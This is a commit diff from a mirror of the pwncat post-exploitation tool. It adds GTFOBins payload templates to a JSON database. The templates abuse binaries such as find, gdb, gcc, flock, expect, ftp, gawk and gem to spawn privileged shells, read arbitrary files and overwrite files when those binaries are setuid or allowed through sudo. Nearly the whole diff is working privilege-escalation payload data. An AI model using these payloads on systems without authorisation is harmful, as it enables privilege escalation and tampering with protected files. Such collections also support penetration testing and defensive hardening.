mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00

Added more GTFObins

John Hammond 2020-05-17 19:35:49 -04:00
parent 14c67f9b4b
commit c930925d27


@ -209,33 +209,6 @@
"exit": "{ctrl_d}"
}
],
//-------------------------------------------------------------------
"gawk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'"
],
"exit": "{ctrl_d}"
}
],
//-------------------------------------------------------------------
"base32": [
{
@ -641,7 +614,192 @@
"args": ["$TF"]
}
],
//-------------------------------------------------------------------
"expand": [
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["{lfile}"]
}
],
//-------------------------------------------------------------------
"expect": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "\"spawn {shell} -p; interact\""],
"exit": "exit\n"
},
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-c", "\"spawn {cat} {lfile}; interact\""]
}
// Theoretically we should be able to get File Write for this.
// Sine it has it own little subprocess, I can't seem to get stdin to funnel in.
],
//-------------------------------------------------------------------
"facter": [
{
"type": "shell",
"payload": "TF=$({mktemp} -d); echo 'exec(\"{shell} -p\")' > $TF/x.rb; FACTERLIB=$TF {command}",
"args": [""]
}
// This does not behave with sudo very often.
// Because it sets an environment variable, -E must be used
// when calling sudo (which pwncat currently does not have support for)
// and the user needs to be able to preserve the environment...
],
//-------------------------------------------------------------------
"find": [
{
"type": "shell",
"payload": "{command}",
"args": [".", "-exec", "{shell} -p", "\\;", "-quit"]
},
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": [".", "-exec", "{cat} {lfile}", "\\;", "-quit"]
}
],
//-------------------------------------------------------------------
"flock": [
{
"type": "shell",
"payload": "{command}",
"args": ["-u", "/", "{shell} -p"]
},
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-u", "/", "{cat} {lfile}"]
},
{
"type": "write",
"stream": "base64",
"payload": "{command}",
"args": ["-u", "/", "{sh} -c \"{base64} -d > {lfile}\""],
"exit": "{ctrl_d}{ctrl_d}"
}
],
//-------------------------------------------------------------------
"fmt": [
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-pNON_EXISTING_PREFIX", "{lfile}"]
}
],
//-------------------------------------------------------------------
"fold": [
{
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-w99999999", "{lfile}"]
}
],
//-------------------------------------------------------------------
"ftp": [
{
"type": "shell",
"payload": "{command}",
"input": "!{shell} -p\n",
// Exit the shell, then exit the FTP client
"exit": "exit\nexit\n"
}
],
//-------------------------------------------------------------------
"gawk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'"
],
"exit": "{ctrl_d}"
}
],
//-------------------------------------------------------------------
"gcc": [
{
"type": "shell",
"payload": "{command}",
"args": ["-wrapper", "{shell},-p,-s", "."]
}
],
//-------------------------------------------------------------------
"gdb": [
{
"type": "shell",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'!{shell} -p'", "-ex", "quit"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'python import os; os.execl(\"{shell}\", \"{shell}\", \"-p\")'", "-ex", "quit"]
},
{
"type": "read",
"stream":"print",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'set height 0'", "-ex", "'python print(open(\"{lfile}\").read())'", "-ex", "quit"]
},
{
"type": "write",
"stream":"print",
"payload": "{command}",
"args": ["-q", "-nx", "-ex", "'python import sys; open(\"{lfile}\",\"w\").write(sys.stdin.read())'", "-ex", "quit"],
"exit": "{ctrl_d}{ctrl_d}"
}
// We SHOULD be able to read base64 data... but for the life of me, I cannot get the whole file to come through. Leaving this alone.
// {
// "type": "write",
// "stream":"base64",
// "payload": "{command}",
// "args": ["-q", "-nx", "-ex", "'python import sys,base64; exec(\"\"\"with open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")'", "-ex", "quit"],
// "exit" : "{ctrl_d}"
// }
// ,
],
//-------------------------------------------------------------------
"gem": [
{
"type": "shell",
"payload": "{command}",
"args": ["open", "-e", "'{shell} -c {shell} -p'", "rdoc"]
},
{
"type": "read",
"stream" : "raw",
"payload": "{command}",
"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
}
],